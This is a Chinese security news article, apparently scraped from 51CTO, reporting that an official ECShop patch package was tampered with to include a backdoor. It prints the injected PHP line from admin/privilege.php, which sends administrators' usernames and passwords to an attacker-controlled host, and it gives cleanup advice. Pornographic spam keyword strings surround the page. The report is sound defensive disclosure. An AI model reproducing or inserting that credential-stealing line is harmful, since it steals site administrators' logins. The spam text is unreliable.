成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

開源網(wǎng)店ECShop又見后門 補丁程序再遭感染

安全 黑客攻防
2013年5月,SCANV網(wǎng)站安全中心曾經(jīng)響應過ECShop網(wǎng)店程序的后門事件,本以為此事已了,不料在近日,又有安全研究人員在漏洞平臺Wooyun上發(fā)現(xiàn)了ECShop官方補丁的后門代碼。

ECShop是很多站長喜歡用的網(wǎng)店程序,其V2.7.3版本用戶甚眾。

2013年5月,SCANV網(wǎng)站安全中心曾經(jīng)響應過ECShop網(wǎng)店程序的后門事件,本以為此事已了,不料在近日,又有安全研究人員在漏洞平臺Wooyun上發(fā)現(xiàn)了ECShop官方補丁的后門代碼。

經(jīng)SCANV網(wǎng)站安全研究人員分析發(fā)現(xiàn),這一次的后門代碼存在于一個編號為273utf8_patch006的歷史補丁文件包中。駭客將補丁包里的(\admin\privilege.php)文件篡改后,插入了一段記錄后臺用戶及密碼等信息的代碼,并發(fā)送到一個由黑客控制的服務器上。值得注意的是,SCANV安全研究人員在分析前兩次補丁后門代碼里并沒有發(fā)現(xiàn)本次的后門代碼,因此,本次后門事件可能發(fā)生在前兩次篡改之前。

本次駭客植入的后門代碼:

文件\admin\privilege.php代碼113-114行:

@file_get_contents('http://[馬賽

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通過進一步分析發(fā)現(xiàn)“http://[馬賽克]/”網(wǎng)站實際是被黑客入侵控制的網(wǎng)站(“肉雞”),而且黑客用來收集密碼等信息的文件目錄還可以“歷遍文件”,如圖:

開源網(wǎng)店ECShop又見后門 補丁程序再遭感染 #p#

經(jīng)過SCANV網(wǎng)站安全研究人員的下載并去重,發(fā)現(xiàn)大概有90個域名網(wǎng)站受影響。列表如下:

開源網(wǎng)店ECShop又見后門 補丁程序再遭感染  

開源網(wǎng)店ECShop又見后門 補丁程序再遭感染

SCANV網(wǎng)站安全研究中心推薦的解決方案:

1、使用ecshoop的站長朋友,核對上面公布的域名,并查看文件\admin\privilege.php內(nèi)容,搜索關鍵詞“w2.php”。如果找到上面提到的惡意代碼,請直接刪除后保存。

2、修改所有擁有后臺權限的用戶的密碼,并通知網(wǎng)站所有用戶修改密碼。

3、復查網(wǎng)站及服務器的安全狀況。

目前,官方已在6月3日發(fā)布新的補丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html),請站長及時檢查修復。

SCANV網(wǎng)站安全中心在此提醒廣大站長,為自己Web程序下載補丁文件時一定要做相應的檢查,哪怕該補丁文件是從官方網(wǎng)站上下載的,也有可能感染惡意后門。正在使用該網(wǎng)店程序的站長可登錄:http://www.scanv.com/tools/#ECShop給自己的ECShop站點做個安全檢測,平時可經(jīng)常登錄SCANV網(wǎng)站安全中心,以便第一時間了解自己網(wǎng)站的安全情況。

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2015-09-21 13:43:21

2017-01-03 15:51:43

2024-07-16 13:30:35

2009-11-13 08:46:16

2009-12-04 13:19:20

Windows 7激活

2016-02-22 17:31:04

2011-02-24 13:35:06

Apache OFBi開源ERP

2020-12-28 10:16:36

黑客攻擊惡意軟件

2009-04-01 11:23:41

開源

2014-12-01 13:14:36

TinyShopTinyRise移動終端購物

2010-06-12 09:48:17

2011-11-25 15:34:33

2009-09-09 14:28:10

互聯(lián)網(wǎng)

2021-02-26 11:36:06

勒索軟件攻擊數(shù)據(jù)泄露

2010-09-29 15:20:29

2011-09-30 12:07:48

2012-08-13 10:23:13

2010-07-20 10:26:50

2009-04-10 08:54:41

2011-09-16 11:25:27

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲国产视频一区二区 | 91美女在线观看 | 中文字幕在线视频观看 | 欧美一区免费 | 一级全黄少妇性色生活免费看 | 国产精品福利网 | 7777奇米影视 | 一区二区中文 | 国产欧美一区二区三区在线看蜜臀 | 一级毛片观看 | 日韩成人在线播放 | 久久久久久久网 | 日韩一二三 | 中文字幕免费观看 | 成人免费高清 | 亚洲精品久久久久久国产精华液 | 欧洲色综合| 亚洲精品99 | 午夜国产羞羞视频免费网站 | 美女视频一区二区三区 | 婷婷综合色 | 精品国产免费人成在线观看 | 欧美成人在线影院 | 夜夜草| 午夜精品久久久久久久久久久久久 | 日日噜噜夜夜爽爽狠狠 | 久久久久九九九女人毛片 | 亚洲欧洲在线观看视频 | 国产精品美女一区二区三区 | a国产一区二区免费入口 | 欧美男人天堂 | 自拍视频一区二区三区 | 成人在线观看免费视频 | 国产精品久久久久久吹潮日韩动画 | 免费在线视频精品 | 欧美黑人狂野猛交老妇 | 日韩精品在线一区 | 亚洲视频国产 | 一区二区中文字幕 | 青青久久久 | 黄色毛片免费看 |